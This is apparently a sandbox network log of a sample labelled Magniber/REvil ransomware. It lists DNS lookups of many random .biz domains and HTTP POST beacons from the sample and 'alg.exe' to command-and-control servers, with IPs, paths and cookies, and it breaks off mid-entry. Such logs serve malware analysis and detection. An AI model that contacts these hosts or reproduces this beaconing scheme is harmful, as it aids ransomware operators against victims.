
Remote address:

8.8.8.8:53

Request

whjovd.biz

IN A

Response

whjovd.biz

IN A

18.141.10.107
POST

http://whjovd.biz/haoacbfsnisxth

alg.exe

Remote address:

18.141.10.107:80

Request

POST /haoacbfsnisxth HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8e779174e9bc6801dc75e2b08641e029|191.101.209.39|1719160445|1719160445|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://whjovd.biz/rp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /rp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f5ef8b62c219eea7fd395749d109e881|191.101.209.39|1719160445|1719160445|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

crl.microsoft.com

mscorsvw.exe

Remote address:

8.8.8.8:53

Request

crl.microsoft.com

IN A

Response

crl.microsoft.com

IN CNAME

crl.www.ms.akadns.net

crl.www.ms.akadns.net

IN CNAME

a1363.dscg.akamai.net

a1363.dscg.akamai.net

IN A

2.17.107.81

a1363.dscg.akamai.net

IN A

2.17.107.9
GET

http://crl.microsoft.com/pki/crl/products/CSPCA.crl

mscorsvw.exe

Remote address:

2.17.107.81:80

Request

GET /pki/crl/products/CSPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 28 Feb 2009 02:01:22 GMT
If-None-Match: "0c55744899c91:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 506
Content-Type: application/octet-stream
Content-MD5: om3LuUjaBeyK+XiF29FJsA==
Last-Modified: Thu, 02 Aug 2018 21:09:09 GMT
ETag: 0x8D5F8BC3066B2E2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 07af9a89-d01e-0081-14c5-9be76a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 23 Jun 2024 16:34:05 GMT
Connection: keep-alive
DNS

gjogvvpsf.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

gjogvvpsf.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

reczwga.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

44.221.84.105
DNS

reczwga.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

44.221.84.105
POST

http://reczwga.biz/ta

alg.exe

Remote address:

44.221.84.105:80

Request

POST /ta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=500611bbdf08ea4d8a24e6de76a421a9|191.101.209.39|1719160446|1719160446|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://reczwga.biz/pjyggum

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /pjyggum HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b93c766e7fb331dc5eaffd21559598b3|191.101.209.39|1719160446|1719160446|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bghjpy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
DNS

bghjpy.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
POST

http://bghjpy.biz/kftnbgygfypyyd

alg.exe

Remote address:

34.211.97.45:80

Request

POST /kftnbgygfypyyd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a8b4c0d9aa88d0ccb387d995322c78f6|191.101.209.39|1719160446|1719160446|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://bghjpy.biz/gos

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /gos HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f4e493df8d8885241133d379cc5e1e43|191.101.209.39|1719160446|1719160446|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

18.208.156.248
POST

http://damcprvgv.biz/xvwdblfudnygcklw

alg.exe

Remote address:

18.208.156.248:80

Request

POST /xvwdblfudnygcklw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=263891526795c4d50a5c95d834402656|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

18.208.156.248
POST

http://damcprvgv.biz/sevyh

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /sevyh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8208f5ef2e86c89b42f1cd59011e7614|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ocsvqjg.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
DNS

ocsvqjg.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
POST

http://ocsvqjg.biz/tymoa

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

3.254.94.185:80

Request

POST /tymoa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=13291b74d2eae559c0d685c3e0c2b208|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ocsvqjg.biz/ywbeqmgccldlbsq

alg.exe

Remote address:

3.254.94.185:80

Request

POST /ywbeqmgccldlbsq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed973795709e875caa99bb01b473cf9d|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ywffr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
DNS

ywffr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
POST

http://ywffr.biz/pjuhrfcpwtk

alg.exe

Remote address:

54.244.188.177:80

Request

POST /pjuhrfcpwtk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b59acde44326561f501c8a6b8cc59e33|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ywffr.biz/w

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c2f6cf34f61af00e7bc7d4aa8fd37b19|191.101.209.39|1719160447|1719160447|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ecxbwt.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
DNS

ecxbwt.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
POST

http://ecxbwt.biz/nsybhlkcdpmywy

alg.exe

Remote address:

54.244.188.177:80

Request

POST /nsybhlkcdpmywy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=311ed124bc7e8d36fcc1852c301d224a|191.101.209.39|1719160448|1719160448|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ecxbwt.biz/rb

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /rb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2249bd97494d6892396abd362a2d1ed7|191.101.209.39|1719160448|1719160448|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/bbcqgjqqtedgagx

alg.exe

Remote address:

44.213.104.86:80

Request

POST /bbcqgjqqtedgagx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=266c64e6db2d7374b9be3b4b450307d4|191.101.209.39|1719160448|1719160448|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/uhlerhwaafkjfd

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /uhlerhwaafkjfd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9d8b8a0e75208a4b71141b93861cba5a|191.101.209.39|1719160448|1719160448|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zyiexezl.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

18.208.156.248
POST

http://zyiexezl.biz/rnvmhjmwnfkj

alg.exe

Remote address:

18.208.156.248:80

Request

POST /rnvmhjmwnfkj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=71f0aeb88f45b4b75da8dffe56f09cee|191.101.209.39|1719160448|1719160448|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zyiexezl.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

18.208.156.248
POST

http://zyiexezl.biz/vccakgaeevvktb

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /vccakgaeevvktb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d9914f78852b3d50bd89a6aa412271b0|191.101.209.39|1719160449|1719160449|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

44.221.84.105
POST

http://banwyw.biz/bsqpibpk

alg.exe

Remote address:

44.221.84.105:80

Request

POST /bsqpibpk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a136c2b09496dc472fac201686539454|191.101.209.39|1719160449|1719160449|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

44.221.84.105
POST

http://banwyw.biz/mhpelfusxe

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /mhpelfusxe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ce8f1855fe16f81120558823cac82baa|191.101.209.39|1719160449|1719160449|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response
DNS

zrlssa.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

44.221.84.105
POST

http://zrlssa.biz/amx

alg.exe

Remote address:

44.221.84.105:80

Request

POST /amx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c54a8ad10f1097d5d1442c6086b81980|191.101.209.39|1719160449|1719160449|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response
DNS

zrlssa.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

44.221.84.105
POST

http://zrlssa.biz/t

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /t HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e1668ea383b14a063f3542a03993f49b|191.101.209.39|1719160449|1719160449|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

